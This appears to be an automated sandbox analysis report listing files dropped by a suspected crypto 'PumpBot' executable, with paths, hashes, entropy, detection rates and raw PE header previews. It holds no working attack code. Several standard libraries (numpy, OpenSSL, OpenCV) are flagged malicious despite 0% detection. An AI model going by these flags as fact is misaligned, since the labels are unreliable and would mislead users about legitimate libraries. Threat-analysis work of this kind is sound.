SHA-256:	794D039FFDF277C047E26F2C7D58F81A5865D8A0EB7024A0FAC1164FEA4D27CF
SHA-512:	0C2D08747712ED227B4992F6F8F3CC21168627A79E81C6E860EE2B5F711AF7F4387D3B71B390AA70A13661FC82806CC77AF8AB1E8A8DF82AD15E29E05FA911BF
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.668757745421387
Encrypted:	false
SSDEEP:	96:s1p72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCFbiormHcX6g8cim1qeSju1:sD2HzzjBbRYoedomcqgvimoe
MD5:	F0027550D46509B0514CF2BF0CC162BC
SHA1:	5B5A9FD863A216B2444CCBD51B1F451D6ECA8179
SHA-256:	77300A458BB8DC0D4FF4D8BDDB3289E90CB079418DBED3E20D2C9A445F39746E
SHA-512:	BB09B814DBE3E4361ABBAFEC4768208C98A7F455EF311B653D61B0B6098197BDAC43E74E2E3868E486819F147B8F7C442C76E5181CC5A7EB13B6E2C2E07BF9B7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C.V"..V"..V".._Z..T"...^..T"...Z..T"...^..]"...^..^"...^..U"..W..U"..V"..p".._..W".._..W".._v.W".._..W"..RichV"..........................PE..d....Y.d.........." ...#.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md__mypyc.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	114176
Entropy (8bit):	5.886098884857882
Encrypted:	false
SSDEEP:	1536:sHThS6iru96gPC2wuFB5wvkgfAeP8QEUkk1iAIRCGMwyRCApQBX2y6KmdKYqBfH:sH1iru96gPzhivkY309e1iAH4dApQBJ
MD5:	E9454A224D11E1BD68C7069B7F5F61A7
SHA1:	793098653D93652415F8BACE81434F6F4490CF1A
SHA-256:	711F292ACE44576F5DE4F592ADEBD9D21FAF569357C289425251D8DCE4FA84CC
SHA-512:	17D993A0C4B56219E8C224EB2BDEA92D9CC4BD3809B0F9FA4CF0DDFDC5EAB4371441D488EA851ABF2F88C691D57A268D5CDCAA9D11D4DD091BC130638FE36460
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........RK.J3%.J3%.J3%.CK..B3%..O$.H3%..K$.H3%..O .G3%..O!.B3%..O&.I3%..F$.I3%.J3$..3%..N-.K3%..N%.K3%..N..K3%..N'.K3%.RichJ3%.........................PE..d....Y.d.........." ...#. ...........#....................................................`..........................................s..d....t..................................$....f...............................d..@............0...............................text...(........ .................. ..`.rdata...U...0...V...$..............@..@.data...p8.......,...z..............@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\concrt140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	317208
Entropy (8bit):	6.325295618585691
Encrypted:	false
SSDEEP:	6144:2VwR2xhiXuz1BxUBE0I3umFKuLHqvqNXV4rnWzgCEcl:Vs9zGEj3saz7l
MD5:	F3C9F61B9E1B25C9DE8D817D3D1C02D7
SHA1:	DAB244AC19C66BB5A7BAE0AEE6E3EA280C30F364
SHA-256:	1F072A6DC98CD882C542208E7A8FE4FBE5239781588F17C005A2607FDFE62D5D
SHA-512:	8A6CF1E91A15B5A1DB52880258F3A39F6CC3BED72E79598F7A10661DD9ED28D369499F585225EB016A2F0B7EDDADE096BA80083DB301B68DEB173FADDE3B9619
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xFo.<'..<'..<'.....>'..5_..6'...H..;'..<'...'...H..4'...H..8'...H..h'...H..='...H..='...H..='..Rich<'..........................PE..d.....t^.........." ................`...............................................;g....`A.............................................M...................p...6.......A......l....3..8........................... 4..0............................................text...,........................... ..`.rdata..*2.......4..................@..@.data....?...0...8..................@....pdata...6...p...8...N..............@..@.rsrc...............................@..@.reloc..l...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cryptography\hazmat\bindings\_rust.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6673920
Entropy (8bit):	6.582002531606852
Encrypted:	false
SSDEEP:	98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
MD5:	486085AAC7BB246A173CEEA0879230AF
SHA1:	EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
SHA-256:	C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
SHA-512:	8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......QN.../.../.../...W(../......./......./......./......./...R.../...Z.../..^W.../.../...-../...",......./.../.../......./......./..Rich./..........PE..d...M7ee.........." ...&..M..........L...................................... f...........`......................................... .a.p.....a.\|............Pb..............Pe.p...p.[.T.....................[.(...0.[.@............0M..............................text.....M.......M................. ..`.rdata.......0M.......M.............@..@.data........0a.......a.............@....pdata.......Pb.......b.............@..@.reloc..p....Pe.......e.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	74447872
Entropy (8bit):	6.7006581120600375
Encrypted:	false
SSDEEP:	393216:XZyc70qJvslvVpbgSnsQqVP7i4iA6zMMX5djMTLiAUhf1NefxzoWuDPpybh:Xen9JDMxzolpyN
MD5:	E758DF0FBF045DF49D75CB4463287BF2
SHA1:	33FEBB0F392A47BCA1197927E2581BFBD4647C96
SHA-256:	90577FA7AD4D992CB7FD16DFB1F36E7220A67B00A6E9C408ECB1C2331265F67F
SHA-512:	D0AFAFB2B319DFC4FF5B946EF4EFC3AE943E4055DDC37FDD9107CE29993FBB2C928CD88E380181954580FC6AD958B3AB97D4942DF57C9508878E89DFA057FE3A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............x..x..x...%...x...%...x...%..3x......x..%&...x..%&...x..%&...x...%...x......{..x...[...%...x..?&..lx.."&...x..x...y..?&..bz..?&...x..?&=.x..?&...x..Rich.x..................PE..d...YP.e.........." .....fD..B=..............................................P............`...........................................:.d1....<.@.............Z.8...............\{..pV..T...................hW..(....V................D..............................text...t".......$.................. ..`IPPCODE.>A...@...B...*.............. ..`.rdata.. e....D..f...lD.............@..@.data... .....=.......<.............@....pdata..8.....Z.......H.............@..@.tls.........@t......Rb.............@...IPPDATA..M...Pt..N...Tb.............@....gfids..h.....t.......b.............@..@_RDATA........t.......b.............@..@.debug_a2....pv......\d.............@..B.debug_i0.....v......bd.

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26314752
Entropy (8bit):	6.591317626319441
Encrypted:	false
SSDEEP:	196608:4WuFNpujlgPA/ujrrZSmB/vb3ty2vKqNn93NN6Yy2fR5yWoVx:4LvujlNujrrZ3vrLnp76Yy2psWWx
MD5:	CB4DB51EE9A423E6168B9D08BEE61EFC
SHA1:	C4D4CEEF485F76EF33780AE9CB7D636BC8C09539
SHA-256:	969A3219854B6B654A7E5A89CCDB87F3CC143AF5E43858EEA0AD9275237EA406
SHA-512:	37D239A7A1171EDA91351FFF0A076B3A38249F2D40849EBF4B5F9302CA44F4B34144F318A422F419F3F89B2EE81BEE3757AA1D979C90FD1F90001FC9B082D4D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."..."..A......n..P..........p.....................................&........ .................................................p...P..8.......D............`..................................(...................L................................text.....A.......A.................`.P`.data........0A.......A.............@.`..rdata..p.>...F...>...E.............@..@.rodata............................@.P@.pdata..D..........................@.0@.xdata...............x..............@.0@.bss.....l............................`..edata...............<..............@.0@.idata..p.......,...>..............@.0..CRT....`....0.......j..............@.@..tls.........@.......l..............@.@..rsrc...8....P.......n..............@.0..reloc.......`.......r..............@.0B........................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3429624
Entropy (8bit):	6.093870626224665
Encrypted:	false
SSDEEP:	49152:6uTKuk2i4IU6ixsOjPWJJrf129Pr1+leV6E3AH/vgpdbZ/NPL0asQa1CPwDv3uF3:6XH+n9Z+1obZ/10asv1CPwDv3uFfJLx
MD5:	63C4F445B6998E63A1414F5765C18217
SHA1:	8C1AC1B4290B122E62F706F7434517077974F40E
SHA-256:	664C3E52F914E351BB8A66CE2465EE0D40ACAB1D2A6B3167AE6ACF6F1D1724D2
SHA-512:	AA7BDB3C5BC8AEEFBAD70D785F2468ACBB88EF6E6CAC175DA765647030734453A2836F9658DC7CE33F6FFF0DE85CB701C825EF5C04018D79FA1953C8EF946AFD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.>y..P..P..Pv..m.P-.Q+}.P-.U+t.P-.T+w.P-.S+{.Pk.Q+t.P..Q..P).S+b.P).T+..P).P+~.P).~.P).R+~.PRich..P*........PE..d.....'a.........." ......$...................................................4.......4...`.........................................@Q/..h....4.@....@4.\|....@2......84......P4..O....,.8...........................P.,.8.............4..............................text...4.$.......$................. ..`.rdata..V.....$.......$.............@..@.data....z....1..,....1.............@....pdata.. ....@2.......1.............@..@.idata..^#....4..$....3.............@..@.00cfg..Q....04.......3.............@..@.rsrc...\|....@4.......3.............@..@.reloc...x...P4..z....3.............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libffi-7.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32792
Entropy (8bit):	6.3566777719925565
Encrypted:	false
SSDEEP:	384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
MD5:	EEF7981412BE8EA459064D3090F4B3AA
SHA1:	C60DA4830CE27AFC234B3C3014C583F7F0A5A925
SHA-256:	F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
SHA-512:	DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libssl-1_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	695032
Entropy (8bit):	5.528361289023932
Encrypted:	false
SSDEEP:	12288:EwIGh2Hjnl6uk51iNXuAX7TBElV57sldbeMR29XxSNreSZYrRnU2lvzsT:Uk51iNZyMR+keSZ6U2lvzsT
MD5:	BD857F444EBBF147A8FCD1215EFE79FC
SHA1:	1550E0D241C27F41C63F197B1BD669591A20C15B
SHA-256:	B7C0E42C1A60A2A062B899C8D4EBD0C50EF956177BA21785CE07C517C143AEAF
SHA-512:	2B85C1521EDEADF7E118610D6546FAFBBAD43C288A7F0F9D38D97C4423A541DFAC686634CDE956812916830FBB4AAD8351A23D95CD490C4A5C0F628244D30F0A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&v..G.^.G.^.G.^.?.^.G.^.2._.G.^.,._.G.^.2._.G.^.2._.G.^.2._.G.^.2._.G.^.G.^HF.^.2._.G.^.2._.G.^.2.^.G.^.2._.G.^Rich.G.^........................PE..d.....'a.........." .....8...L......<.....................................................`.........................................p+...N..HE..........s........K...~..........l.......8...............................8............0..H............................text....6.......8.................. ..`.rdata..z)...P...*...<..............@..@.data...QM.......D...f..............@....pdata...T.......V..................@..@.idata..PW...0...X..................@..@.00cfg..Q............X..............@..@.rsrc...s............Z..............@..@.reloc..]............b..............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	590112
Entropy (8bit):	6.461874649448891
Encrypted:	false
SSDEEP:	12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
MD5:	01B946A2EDC5CC166DE018DBB754B69C
SHA1:	DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
SHA-256:	88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
SHA-512:	65DC3F32FAF30E62DFDECB72775DF870AF4C3A32A0BF576ED1AAAE4B16AC6897B62B19E01DC2BF46F46FBE3F475C061F79CBE987EDA583FEE1817070779860E5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LS..-=..-=..-=.....-=..U...-=..-<.k-=.gB<..-=.gB9..-=.gB>..-=.gB8.=-=.gB=..-=.gB..-=.gB?..-=.Rich.-=.........PE..d.....t^.........." .....@..........."...............................................z....`A.........................................j..h....D..,...............L;...... A......(...@...8...............................0............P.......f..@....................text...,>.......@.................. ..`.rdata..r....P.......D..............@..@.data....:...`..."...N..............@....pdata..L;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31728
Entropy (8bit):	6.499754548353504
Encrypted:	false
SSDEEP:	384:rOY/H1SbuIqnX8ndnWc95gW3C8c+pBj0HRN7bULkcyHRN7rxTO6iuQl9xiv:yYIBqnMdxxWd4urv
MD5:	0FE6D52EB94C848FE258DC0EC9FF4C11
SHA1:	95CC74C64AB80785F3893D61A73B8A958D24DA29
SHA-256:	446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
SHA-512:	C39A134210E314627B0F2072F4FFC9B2CE060D44D3365D11D8C1FE908B3B9403EBDD6F33E67D556BD052338D0ED3D5F16B54D628E8290FD3A155F55D36019A86
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.{.zl..zl..zl......xl..s...~l.....}l.....xl..zl..Ql......l.....il.....{l.....{l.....{l..Richzl..................PE..d.....t^.........." .........$......p.....................................................`A........................................p>..L....?..x....p.......`..X....:...A......p...P3..8............................3..0............0..@............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..X....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs\libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35818505
Entropy (8bit):	6.327902691528042
Encrypted:	false
SSDEEP:	196608:rxLAe3TZlzOI/4zLb4dTtT1muO2GSm4EVBXoJvROQxRBNV1BUG9BFePKLFNe5NF+:ffeDF2Z
MD5:	A77007FF2124C82858103640C493B22B
SHA1:	2FDBFE72118ECCEEEF1539970F1972FF88B304AC
SHA-256:	3BE12D2DAE83027DC6C6CEE9DFBF9DA4040897C469B755DB49415A3EFB23CF09
SHA-512:	AC7568D943564C57E2E8CB318B27551C9DBF72E340E6DDB0768B29BE77104A5BEA6BC08FF0A4F820AA0B40022FC888A22A45BD078BCEC630C9150B0EC04B1D26
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...$G.a..........& .....z...R......0......... m.............................`.......o#....... ...................................... .........t............0...#...............Q..............................(...................(................................text....y.......z..................`..`.data...P...........................@.`..rdata.. x.......z..................@.p@.pdata...#...0...$..................@.0@.xdata..h!...`..."...8..............@.0@.bss....`.............................`..edata...... .......Z..............@.0@.idata..t...........................@.0..CRT....`...........................@.@..tls................................@.@..reloc...Q.......R..................@.0B/4...........`.......X..............@.PB/19.....-a...p...b...\..............@..B/31.................................@..B/45......I.......J..................@..B/57.....

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_tests.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	118272
Entropy (8bit):	6.202878330778971
Encrypted:	false
SSDEEP:	1536:Z+KBzxFlU5ejfqHKnxZL6Qns57ZAOtvByPjUTmSPLPuczC4b:xhWHs7nEAUPTmSPLWcu4
MD5:	751DFEF14C0C3CBAA5A4868CDCB80934
SHA1:	F4B1966C3987567083953A7877F2F15034D80F8E
SHA-256:	43FB14B504F6114D07D2811766F1493F808935B7DD65216476E1F2F75702B93E
SHA-512:	57BE2E1D9F8ACC73B18264C90561DBE3FF9631CEE146217DD0F80D58529D83283390B2DA38992B1CFE6A2EF8EDB5BF4F26BFBAB3B1EFFF3BDB10059549964D20
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z.!.;.r.;.r.;.r.Chr.;.r.N.s.;.r[I.s.;.r.T.r.;.r.N.s.;.r.N.s.;.r.N.s.;.r1N.s.;.r.;.rU;.r2N.s.;.r2N.s.;.r2N.s.;.r2N.r.;.r2N.s.;.rRich.;.r........PE..d....F.a.........." .....R...~............................................... ............`.................................................,...................P....................z...............................z..8............p...............................text...(P.......R.................. ..`.rdata...:...p...<...V..............@..@.data...x+.......&..................@....pdata..P...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_umath.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2989568
Entropy (8bit):	6.547123088829209
Encrypted:	false
SSDEEP:	49152:I8Ov4LdZXipkHNrsBcDU65i/Kq0mXNLgHxNK:XL1rGcAjQN
MD5:	FD048AABFB6204E44AA8B0ECFA4855B1
SHA1:	AF321C84902AEE10F4AF03FA2C924B5075ADBFAA
SHA-256:	047D54E7BAD0D514292FC963C4AF9934BDA1BE6104E62A5B1E2120DA4DBF787A
SHA-512:	08C87E70634389D75175CDB8C3D1F481B59601A9556AB3D51B3660AD439E69DCEBB6F5B15245ABA80F782EE92B27A3102081BF3EF1A9A3B352AE76D022241A10
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.z...)...)...).{.)...).v.(...)Jq.(...).l})...).v.(...).v.(...).v.(...) v.(...)#v.(...)...)s..)#v.(...)#v.(...)#v.(...)#v.)...)#v.(...)Rich...)........PE..d...MG.a.........." ......"..........`......................................../...........`.........................................p+%.t....+%.,...../.......-.8............./. $..@b".............................`b".8............0"..............................text...8."......."................. ..`.rdata..d-...0".......".............@..@.data...xS...`%..P...L%.............@....pdata..8.....-.......+.............@..@.rsrc........./......v-.............@..@.reloc.. $..../..&...x-.............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\fft\_pocketfft_internal.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	6.184904717755863
Encrypted:	false
SSDEEP:	3072:N1u8uGHEV2A8wl+WYdIYEIcpd5MsmTZY5TZZXZuyisJDwTXP3Zli:N48r621wcrdIpdmbVY5VZXosyTXBli
MD5:	6FE3CD313A725412F423FE72A2418657
SHA1:	D86230F04428AAE462170F18D2A796374AE02C55
SHA-256:	E6DBECD4B042CF8992A19C655DA7019B8F10BDB0662B7144EC9004B468B5F435
SHA-512:	38A14B7770D466D5CA5D5E0FB1FEED7DCBD2FA25E3E81297B2BAC53CC6EB883F22E43F0D3D45E4C8E88DB604C7F12352A3605ACD9CC243B0F27D8564B6C78049
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................u..........................................................j............Rich............PE..d...]G.a.........." .........:......P.....................................................`.........................................@...x.......................l...............<...`...................................8............................................text............................... ..`.rdata..@ ......."..................@..@.data... ...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\linalg\_umath_linalg.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	168960
Entropy (8bit):	6.402314317235315
Encrypted:	false
SSDEEP:	3072:4xTIInbbHPAtIF2fpbmA0iKjhtigRc2JvUY30dGbl/yA:4xTfXHPOohtbRnV0dAy
MD5:	FD21D5634CD72DC2A4D6FC0C8A93BBE1
SHA1:	BED5C9BE60098A9423389B7159ADF50F6E2E494A
SHA-256:	7F5552291752A06113DD9AB580AE8465CC38ED6D09CE4D944EBDBC528F2495C2
SHA-512:	84858D40C4A1BCEB63D75106610B73B870602DD22515456C1404EAF777CD7B686F08C84FA886ABFB59E5BF6B3C3E5D40BE7364FE7DD12E4FE3C1F4B49CA31DAC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.n.v...v...v.......~...$...t.......t.......w...$...z...$...~...$...u.......t.......u...v...........u.......w.......w.......w.......w...Richv...........PE..d..._G.a.........." ................p.....................................................`..........................................b..l...\c.......................................9...............................9..8............0...............................text............................... ..`.rdata..XB...0...D..................@..@.data...x!...........^..............@....pdata...............x..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_bounded_integers.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	251904
Entropy (8bit):	6.446822526849366
Encrypted:	false
SSDEEP:	6144:KXUycMEBewlPavBBlaX0GOyotiUmvKus+jwTpNj:5FPavBB4X0G1otiXPDjw
MD5:	F7A41CE8D0418796F7BE4A13B1E4D756
SHA1:	57D7381EC3B0537914E27097A3401CE1F4F6B720
SHA-256:	4B240FC16E922FC6AE5BFD4534788F78D3329E75E86D09AC24242C62B198E63A
SHA-512:	A8C316B8CE6CA3E11F31C1FBCA1A128D79820BB902B7F85EC20A45640B7C62E3AFC9A59CC5E0BF85BE2919DACB8FDAEB3762A48AEC67C3EF76BB03F8D236A75C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........B..............8............u......................................p..........................T............Rich....................PE..d....G.a.........." ................p\|.......................................@............`.........................................0... ...P...x.... .......................0..\...Hv..............................pv..8............ ..P............................text............................... ..`.rdata....... ......................@..@.data....8......."..................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..\....0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_common.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	182784
Entropy (8bit):	6.119753294560959
Encrypted:	false
